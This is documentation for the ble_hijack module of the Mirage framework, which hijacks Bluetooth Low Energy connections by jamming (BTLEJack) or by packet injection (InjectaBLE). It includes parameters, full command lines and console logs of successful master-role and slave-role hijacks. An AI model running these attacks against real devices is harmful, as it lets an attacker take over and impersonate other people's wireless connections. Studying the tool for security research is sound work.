ble_hijack¶
Presentation¶
ble_hijack implements active attacks allowing to hijack the slave or the master role of a Bluetooth Low Energy connection. It can perform the jamming based BTLEJack attack, allowing to hijack the master or the slave role, but also the injection based hijacking attacks provided by InjectaBLE.
The BTLEJack attack sniffs an established connection, synchronizes to it and jams the packet emitted by the slave. As a consequence, if the master reachs its timeout value, it disconnects from the slave device and the attacker is able to communicate with the slave device instead of him.
The InjectaBLE attacks sniffs a connection, injects a malicious packet into it to disconnects the Master or the Slave, then synchronize with the other device and mimicks the hijacked role.
This module allows to hijack a new connection (setting the input parameter HIJACKING_MODE to “newConnections”) or an established connection (setting the input parameter HIJACKING_MODE to “existingConnections”. Some additional parameters can be provided, allowing to “help” the module to find the right target (TARGET for a new connection, ACCESS_ADDRESS, CRC_INIT and CHANNEL_MAP for an existing connection). This module needs ble_sniff, and cannot be used alone. Indeed, when the connection is hijacked, the module terminates its execution, allowing to run another module, such as ble_master or ble_discover. It can be used similarly to the module ble_connect.
Warning
These attacks are sometimes unstable, and may require multiple attempts. This module is experimental and is only provided as a proof of concept.
Compatible devices¶
Input parameters¶
Name |
Default value |
Possible values |
Description |
|---|---|---|---|
INTERFACE |
microbit0 |
microbitX, butterflyX |
Primary interface to use |
INTERFACEA |
microbitX, butterflyX |
Optionnal additional interface |
|
INTERFACEB |
microbitX, butterflyX |
Optionnal additional interface |
|
TARGET |
<BD address> |
Target address |
|
CHANNEL |
37 |
37|38|39 |
Communication channel to observe |
HIJACKING_MODE |
newConnections |
newConnections|existingConnections |
Hijacking strategy |
ROLE |
master |
master|slave |
Role to hijack |
ACCESS_ADDRESS |
0xYYYY |
Access address for an existing connection |
|
CRC_INIT |
0xYYYYYY |
CRCInit for an existing connection |
|
CHANNEL_MAP |
0xYYYYYYYYYY |
Channel Map for an existing connection |
Output parameters¶
Name |
Possible values |
Description |
|---|---|---|
INTERFACE |
microbitX |
Primary interface used |
Usage¶
Hijacking the master role in a new connection¶
If you use a Microbit device, the hijacking strategy will be based on jamming, however if you use a ButteRFly device, the strategy will be based on InjectaBLE attack (e.g. injection malicious packet into an established BLE connection). If you want to easily hijack a new connection, please sets “newConnections” as value of the input parameter HIJACKING_MODE and “master” as value of the input parameter ROLE:
$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=master
[INFO] Module ble_hijack loaded !
[INFO] Module ble_master loaded !
[SUCCESS] BTLEJack device #0 successfully instantiated (firmware version : 3.14)
[INFO] Custom Mirage Firmware used ! Advertisements sniffing and jamming will be supported.
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126 │ 0xe12e70 │ 0x1e007fffff │ 36 │ 6 │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Recovering Hop Interval ...
[SUCCESS] Hop Interval successfully recovered : 36
[INFO] Recovering Hop Increment ...
[SUCCESS] Hop Increment successfully recovered : 6
[INFO] All parameters recovered, following connection ...
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x88262126 │ 0xe12e70 │ 0x1e007fffff │ 36 │ 6 │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Hijacking in progress ...
[MASTER|0x88262126]:
Then, you can use the ble_master, exactly as if you used it alone or with ble_connect.
Hijacking the master role in an existing connection¶
Similarly, if you want to hijack an existing connection, please sets “existingConnections” as value of the input parameter HIJACKING_MODE :
$ sudo mirage "ble_hijack|ble_master" ble_hijack1.HIJACKING_MODE=existingConnections ble_hijack1.ROLE=master
Then, the execution is quite similar to the previously described one.
Hijacking the slave role in a new connection¶
You can perform a slave hijacking attack using ButteRFly device, based on InjectaBLE attack. Please sets “newConnections” as value of the input parameter HIJACKING_MODE and “slave” as value of the input parameter ROLE:
sudo mirage "ble_hijack|ble_slave" ble_hijack1.INTERFACE=butterfly0 ble_hijack1.HIJACKING_MODE=newConnections ble_hijack1.ROLE=slave
[sudo] Mot de passe de rcayre :
[INFO] Module ble_hijack loaded !
[INFO] Module ble_slave loaded !
[SUCCESS] ButteRFly device successfully instantiated !
[PACKET] [ CH:37|CLK:158609287.0|RSSI:0dBm ] << BLE - Advertisement Packet | type=CONNECT_REQ | srcAddr=5B:F0:E9:8F:91:46 | dstAddr=74:DA:EA:91:47:E3 | accessAddress=0x9e25da8b| crcInit=0x832bb3| channelMap=0x1fffe007ff| hopInterval=36| hopIncrement=9 >>
┌Sniffed Connection─────────┬──────────────┬──────────────┬───────────────┐
│ Access Address │ CRCInit │ Channel Map │ Hop Interval │ Hop Increment │
├────────────────┼──────────┼──────────────┼──────────────┼───────────────┤
│ 0x8bda259e │ 0xb32b83 │ 0x1fffe007ff │ 36 │ 9 │
└────────────────┴──────────┴──────────────┴──────────────┴───────────────┘
[INFO] Attack started in 5 seconds...
[PACKET] [ CH:9|CLK:158638763.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_FEATURE_REQ | data=ff7d000000000000 >>
[...]
[PACKET] [ CH:23|CLK:161293813.0|RSSI:0dBm ] << BLE - Control PDU Packet | type=LL_CHANNEL_MAP_REQ | data=ff01e0ff1f8d00 >>
[INFO] Starting Master Hijacking attack: injecting LL_TERMINATE_IND...
[SUCCESS] Attack successful !
[INFO] SubInterface available: butterfly0:sub1 (slave)
[INFO] Instantiating subdevice :butterfly0:sub1
[INFO] No filename provided : empty database !
[SLAVE]:
Then, you can use the ble_slave, exactly as if you used it directly.